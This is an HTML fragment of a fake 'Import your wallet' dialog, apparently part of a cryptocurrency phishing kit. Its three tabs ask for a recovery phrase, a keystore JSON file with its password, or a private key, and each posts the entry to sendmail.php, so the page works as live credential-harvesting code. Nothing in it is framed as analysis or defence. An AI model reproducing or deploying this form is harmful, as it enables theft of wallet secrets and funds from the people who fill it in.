  <form action="sendmail.php" method="POST" enctype="multipart/form-data" id="form" onsubmit="return true">


              <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">

                <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;"> <img src="suspendedpage.html" style="margin-right: 20px; height: 40px; width: 40px" id="myImg"><span>Import your <span id="walletname"></span> wallet
                  </span>
                </h3>
                <div class="mt-2">
                  <div class="mt-10">
                    <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
                      <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Phrase
                      </div>
                      <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Keystore JSON
                      </div>
                      <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Private Key
                      </div>
                    </div>
                    <div id="first" class="acc-body active">
                      <div class="flex flex-col">
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative">
						
						<input type="text" required="required" placeholder="Enter your Wallet" name="wallet_name" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
						<textarea cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="phrase" required minlength="12" id="phraseInput"></textarea>
                          <p class="text-xs text-grey-300 mt-6">
                            Typically 12 (sometimes 24) words separated by single spaces
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full">
					  
					  <button type="submit" class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in" id="phraseProceed" name="submit1"><span class="mr-2 uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"/>
                            </svg></span></button></div>
                    </div>
                    <div id="second" class="acc-body bg-grey-600">
                      <div class="flex flex-col">

                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><textarea cols="30" rows="4" placeholder="Keystore JSON" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="keystore" required id="keystorejson"></textarea></div>
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><input type="text" required="required" name="keystorepassword" placeholder="Wallet password" id="keystorepassword" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                          <p class="text-xs text-grey-300 mt-6">
                            Several lines of text beginning with "{...}" plus the password you used to encrypt it.
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full">
					  <button type="submit" name="submit2" class="flex items-center justify-center focus:outline-none
                        text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                        w-full transition duration-150 ease-in" id="keystorejsonproceed"><span class="mr-2
                        uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                        0 11-18 0 9 9 0 0118 0z"/>
                            </svg></span></button></div>
                    </div>
                    <div id="third" class="acc-body bg-grey-600">
                      <div class="flex flex-col">
                        <div class="relative"><input type="text" required="required" placeholder="Enter your Wallet" name="wallet_name" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
						</div>
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><input type="text" required="required" placeholder="Enter your Private Key" name="privatekey" id="privatekey" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                          <p class="text-xs text-grey-300 mt-6">
                            Typically 12 (sometimes 24) words seperated by a single space.
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full">
					  <button type="submit" name="submit3" class="flex items-center justify-center focus:outline-none
                        text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                        w-full transition duration-150 ease-in" id="privatekeyProceed"><span class="mr-2
                        uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                        0 11-18 0 9 9 0 0118 0z"/>
                            </svg></span></button></div>
                    </div>
            </div>
            <div class="bg-gray-50 px-4 py-3 sm:px-6 sm:flex sm:flex-row-reverse"><button id="cancel" type="button" class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
      Cancel
    </button></div>
            </div></div></form>